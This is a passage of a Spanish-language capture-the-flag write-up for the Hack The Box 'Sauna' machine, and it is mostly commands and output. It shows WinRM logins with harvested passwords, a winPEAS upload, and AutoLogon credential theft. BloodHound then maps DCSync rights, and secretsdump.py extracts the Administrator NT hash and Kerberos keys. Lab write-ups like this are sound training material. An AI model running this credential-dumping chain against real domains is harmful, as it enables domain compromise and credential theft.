<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#393A34;--shiki-dark:#BABED8">            [+] Enumerated shares</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#B56959;--shiki-dark:#C3E88D">            Share</span><span style="color:#B56959;--shiki-dark:#C3E88D">           Permissions</span><span style="color:#B56959;--shiki-dark:#C3E88D">     Remark</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#A65E2B;--shiki-dark:#C3E88D">            -----</span><span style="color:#A65E2B;--shiki-dark:#C3E88D">           -----------</span><span style="color:#A65E2B;--shiki-dark:#C3E88D">     ------</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#B56959;--shiki-dark:#C3E88D">            ADMIN</span><span style="color:#393A34;--shiki-dark:#BABED8">$                          </span><span style="color:#B56959;--shiki-dark:#C3E88D">Remote</span><span style="color:#B56959;--shiki-dark:#C3E88D"> Admin</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#B56959;--shiki-dark:#C3E88D">            C</span><span style="color:#393A34;--shiki-dark:#BABED8">$                              </span><span style="color:#B56959;--shiki-dark:#C3E88D">Default</span><span style="color:#B56959;--shiki-dark:#C3E88D"> share</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#B56959;--shiki-dark:#C3E88D">            IPC</span><span style="color:#393A34;--shiki-dark:#BABED8">$            </span><span style="color:#B56959;--shiki-dark:#C3E88D">READ</span><span style="color:#B56959;--shiki-dark:#C3E88D">            Remote</span><span style="color:#B56959;--shiki-dark:#C3E88D"> IPC</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#B56959;--shiki-dark:#C3E88D">            NETLOGON</span><span style="color:#B56959;--shiki-dark:#C3E88D">        READ</span><span style="color:#B56959;--shiki-dark:#C3E88D">            Logon</span><span style="color:#B56959;--shiki-dark:#C3E88D"> server</span><span style="color:#B56959;--shiki-dark:#C3E88D"> share</span><span style="color:#393A34;--shiki-dark:#BABED8"> </span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#B56959;--shiki-dark:#C3E88D">            print</span><span style="color:#393A34;--shiki-dark:#BABED8">$          </span><span style="color:#B56959;--shiki-dark:#C3E88D">READ</span><span style="color:#B56959;--shiki-dark:#C3E88D">            Printer</span><span style="color:#B56959;--shiki-dark:#C3E88D"> Drivers</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#B56959;--shiki-dark:#C3E88D">            RICOH</span><span style="color:#B56959;--shiki-dark:#C3E88D"> Aficio</span><span style="color:#B56959;--shiki-dark:#C3E88D"> SP</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 8300</span><span style="color:#B56959;--shiki-dark:#C3E88D">DN</span><span style="color:#B56959;--shiki-dark:#C3E88D"> PCL</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 6</span><span style="color:#B56959;--shiki-dark:#C3E88D">                 We</span><span style="color:#B56959;--shiki-dark:#C3E88D"> cant</span><span style="color:#B56959;--shiki-dark:#C3E88D"> print</span><span style="color:#B56959;--shiki-dark:#C3E88D"> money</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#B56959;--shiki-dark:#C3E88D">            SYSVOL</span><span style="color:#B56959;--shiki-dark:#C3E88D">          READ</span><span style="color:#B56959;--shiki-dark:#C3E88D">            Logon</span><span style="color:#B56959;--shiki-dark:#C3E88D"> server</span><span style="color:#B56959;--shiki-dark:#C3E88D"> share</span><span style="color:#393A34;--shiki-dark:#BABED8"> </span></span></code></pre> 
<p>Echando un vistazo a searchsploit hay un puñado de exploits para esto pero primero necesitamos una shell. Podemos ver que podemos autenticar con winrm.</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> crackmapexec winrm 10.10.10.175 -u </span><span style="color:#B5695999;--shiki-dark:#89DDFF">&#39;</span><span style="color:#B56959;--shiki-dark:#C3E88D">fsmith</span><span style="color:#B5695999;--shiki-dark:#89DDFF">&#39;</span><span style="color:#393A34;--shiki-dark:#BABED8"> -p </span><span style="color:#B5695999;--shiki-dark:#89DDFF">&#39;</span><span style="color:#B56959;--shiki-dark:#C3E88D">Thestrokes23</span><span style="color:#B5695999;--shiki-dark:#89DDFF">&#39;</span><span style="color:#393A34;--shiki-dark:#BABED8"> </span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    5985</span><span style="color:#B56959;--shiki-dark:#C3E88D">   saunaNA</span><span style="color:#393A34;--shiki-dark:#BABED8">            [*] Windows 10.0 Build 17763 </span><span style="color:#999999;--shiki-dark:#89DDFF">(</span><span style="color:#59873A;--shiki-dark:#FFCB6B">name:saunaNA</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">domain:EGOTISTICAL-BANK.LOCAL</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">HTTP</span><span style="color:#2F798A;--shiki-dark:#F78C6C">        10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    5985</span><span style="color:#B56959;--shiki-dark:#C3E88D">   saunaNA</span><span style="color:#393A34;--shiki-dark:#BABED8">            [*] http://10.10.10.175:5985/wsman</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">WINRM</span><span style="color:#2F798A;--shiki-dark:#F78C6C">       10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    5985</span><span style="color:#B56959;--shiki-dark:#C3E88D">   saunaNA</span><span style="color:#393A34;--shiki-dark:#BABED8">            [+] EGOTISTICAL-BANK.LOCAL</span><span style="color:#A65E2B;--shiki-dark:#BABED8">\f</span><span style="color:#393A34;--shiki-dark:#BABED8">smith:Thestrokes23 </span><span style="color:#999999;--shiki-dark:#89DDFF">(</span><span style="color:#59873A;--shiki-dark:#FFCB6B">Pwn3d!</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span></span></code></pre> 
<p>Usaré evil-winrm para conseguir shell.</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> evil-winrm -u fsmith -i 10.10.10.175 -p Thestrokes23</span></span></code></pre> 
<p>Echando un vistazo al Escritorio podemos coger nuestra bandera de usuario.</p>
<h1 id="lateral-movement">Lateral movement</h1>
<p>He subido una gran herramienta llamada winPEAS que es genial para un poco de automatización cuando se trata de escalar. Lo subí usando Evil-Winrm</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">*</span><span style="color:#393A34;--shiki-dark:#BABED8">Evil-WinRM</span><span style="color:#AB5959;--shiki-dark:#89DDFF">*</span><span style="color:#393A34;--shiki-dark:#BABED8"> PS C:</span><span style="color:#A65E2B;--shiki-dark:#BABED8">\T</span><span style="color:#393A34;--shiki-dark:#BABED8">emp</span><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> upload winPEASx64.exe </span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#BABED8">                                        </span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">Info:</span><span style="color:#B56959;--shiki-dark:#C3E88D"> Uploading</span><span style="color:#B56959;--shiki-dark:#C3E88D"> /home/mhil4ne/Downloads/winPEASx64.exe</span><span style="color:#B56959;--shiki-dark:#C3E88D"> to</span><span style="color:#B56959;--shiki-dark:#C3E88D"> C:</span><span style="color:#A65E2B;--shiki-dark:#BABED8">\T</span><span style="color:#B56959;--shiki-dark:#C3E88D">emp</span><span style="color:#A65E2B;--shiki-dark:#BABED8">\w</span><span style="color:#B56959;--shiki-dark:#C3E88D">inPEASx64.exe</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#BABED8">                                        </span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">Data:</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 3183272</span><span style="color:#B56959;--shiki-dark:#C3E88D"> bytes</span><span style="color:#B56959;--shiki-dark:#C3E88D"> of</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 3183272</span><span style="color:#B56959;--shiki-dark:#C3E88D"> bytes</span><span style="color:#B56959;--shiki-dark:#C3E88D"> copied</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#BABED8">                                        </span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">Info:</span><span style="color:#B56959;--shiki-dark:#C3E88D"> Upload</span><span style="color:#B56959;--shiki-dark:#C3E88D"> successful</span></span></code></pre> 
<p>Obtenemos una gran cantidad de resultados de esto, pero una sección sobresale en particular, el AutoLogon Una cuenta de servicio tiene un inicio de sesión automático activado y podemos cosechar svc_loanmgr! como credenciales válidas.</p>
<p><img src="/_astro/3.9zH7J4mi_Z1ocnFw.webp" alt="alt text" width="640" height="91" loading="lazy" decoding="async"></p>
<p>Podemos probar esas credenciales con Evil-Winrm y entramos</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> evil-winrm -u svc_loanmgr -i 10.10.10.175 -p Moneymakestheworldgoround</span><span style="color:#AB5959;--shiki-dark:#89DDFF">!</span></span>
<span class="line"></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">*</span><span style="color:#393A34;--shiki-dark:#BABED8">Evil-WinRM</span><span style="color:#AB5959;--shiki-dark:#89DDFF">*</span><span style="color:#393A34;--shiki-dark:#BABED8"> PS C:</span><span style="color:#A65E2B;--shiki-dark:#BABED8">\U</span><span style="color:#393A34;--shiki-dark:#BABED8">sers</span><span style="color:#A65E2B;--shiki-dark:#BABED8">\s</span><span style="color:#393A34;--shiki-dark:#BABED8">vc_loanmgr</span><span style="color:#A65E2B;--shiki-dark:#BABED8">\D</span><span style="color:#393A34;--shiki-dark:#BABED8">ocuments</span><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> </span></span></code></pre> 
<h1 id="get-administrator">Get Administrator</h1>
<p>Con estas credenciales, podemos ejecutar una herramienta llamada Bloodhound. Es una herramienta que encuentra relaciones ocultas dentro de Active Directory. A menudo puede conducir a una rápida escalada de privilegios. Hay una versión en python e impacket que usaré para saunana.</p>
<p>La instalación es muy sencilla.</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">sudo</span><span style="color:#B56959;--shiki-dark:#C3E88D"> pip</span><span style="color:#B56959;--shiki-dark:#C3E88D"> install</span><span style="color:#B56959;--shiki-dark:#C3E88D"> bloodhound</span></span></code></pre> 
<p>Entonces podemos ejecutar el comando:</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> bloodhound-python -u svc_loanmgr -p Moneymakestheworldgoround</span><span style="color:#AB5959;--shiki-dark:#89DDFF">!</span><span style="color:#59873A;--shiki-dark:#FFCB6B"> -d</span><span style="color:#B56959;--shiki-dark:#C3E88D"> EGOTISTICAL-BANK.LOCAL</span><span style="color:#A65E2B;--shiki-dark:#C3E88D"> -ns</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#A65E2B;--shiki-dark:#C3E88D"> -c</span><span style="color:#B56959;--shiki-dark:#C3E88D"> All</span></span></code></pre> 
<p>Para iniciar el ataque. creó un montón de archivos .json que que vamos a importar en bloodhound.</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> ls</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">20240218112738_computers.json</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    20240218112738</span><span style="color:#B56959;--shiki-dark:#C3E88D">_domains.json</span><span style="color:#2F798A;--shiki-dark:#F78C6C">   20240218112738</span><span style="color:#B56959;--shiki-dark:#C3E88D">_groups.json</span><span style="color:#2F798A;--shiki-dark:#F78C6C">   20240218112738</span><span style="color:#B56959;--shiki-dark:#C3E88D">_users.json</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">20240218112738_containers.json</span><span style="color:#2F798A;--shiki-dark:#F78C6C">   20240218112738</span><span style="color:#B56959;--shiki-dark:#C3E88D">_gpos.json</span><span style="color:#2F798A;--shiki-dark:#F78C6C">      20240218112738</span><span style="color:#B56959;--shiki-dark:#C3E88D">_ous.json</span></span></code></pre> 
<p>para iniciar la consola bloodhound ejecuté neo4j console y luego bloodhound en la consola. A continuación, vamos a subir nuestros archivos haciendo clic en el botón de carga a la derecha.</p>
<p><img src="/_astro/4.FBnRCr4a_ZbE2O1.webp" alt="alt text" width="163" height="336" loading="lazy" decoding="async"></p>
<p>Después de importar nuestros archivos podemos seleccionar «Find Principals with DCSync Rights» y genera un gráfico. Nuestra cuenta de servicio tiene dos permisos. Nótese que son permisos similares a los de los administradores.</p>
<ul>
<li>GetChanges</li>
<li>GetChangesAll</li>
</ul>
<p><img src="/_astro/5._VaZMnT6_234qs.webp" alt="alt text" width="1538" height="750" loading="lazy" decoding="async"></p>
<p>Hice clic con el botón derecho en la relación y seleccioné «Ayuda». En Abuse info,m me enteré de que podemos realizar un ataque dcsync para obtener hashes de contraseñas.</p>
<p><img src="/_astro/6.L83nKhES_Z1iWlgD.webp" alt="alt text" width="590" height="335" loading="lazy" decoding="async"></p>
<p>Impacket tiene una herramienta llamada secretsdump.py que podemos utilizar para aprovechar esto.</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">python3</span><span style="color:#B56959;--shiki-dark:#C3E88D"> secretsdump.py</span><span style="color:#B56959;--shiki-dark:#C3E88D"> egotistical-bank/svc_loanmgr@10.10.10.175</span><span style="color:#A65E2B;--shiki-dark:#C3E88D"> -just-dc-user</span><span style="color:#B56959;--shiki-dark:#C3E88D"> Administrator</span><span style="color:#393A34;--shiki-dark:#BABED8"> </span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">Impacket</span><span style="color:#B56959;--shiki-dark:#C3E88D"> v0.11.0</span><span style="color:#B56959;--shiki-dark:#C3E88D"> -</span><span style="color:#B56959;--shiki-dark:#C3E88D"> Copyright</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 2023</span><span style="color:#B56959;--shiki-dark:#C3E88D"> Fortra</span></span>
<span class="line"></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">Password:</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#89DDFF">[</span><span style="color:#AB5959;--shiki-dark:#89DDFF">*</span><span style="color:#999999;--shiki-dark:#89DDFF">]</span><span style="color:#393A34;--shiki-dark:#BABED8"> Dumping Domain Credentials </span><span style="color:#999999;--shiki-dark:#89DDFF">(</span><span style="color:#59873A;--shiki-dark:#FFCB6B">domain\uid:rid:lmhash:nthash</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#89DDFF">[</span><span style="color:#AB5959;--shiki-dark:#89DDFF">*</span><span style="color:#999999;--shiki-dark:#89DDFF">]</span><span style="color:#393A34;--shiki-dark:#BABED8"> Using the DRSUAPI method to get NTDS.DIT secrets</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#89DDFF">[</span><span style="color:#AB5959;--shiki-dark:#89DDFF">*</span><span style="color:#999999;--shiki-dark:#89DDFF">]</span><span style="color:#393A34;--shiki-dark:#BABED8"> Kerberos keys grabbed</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e</span></span>
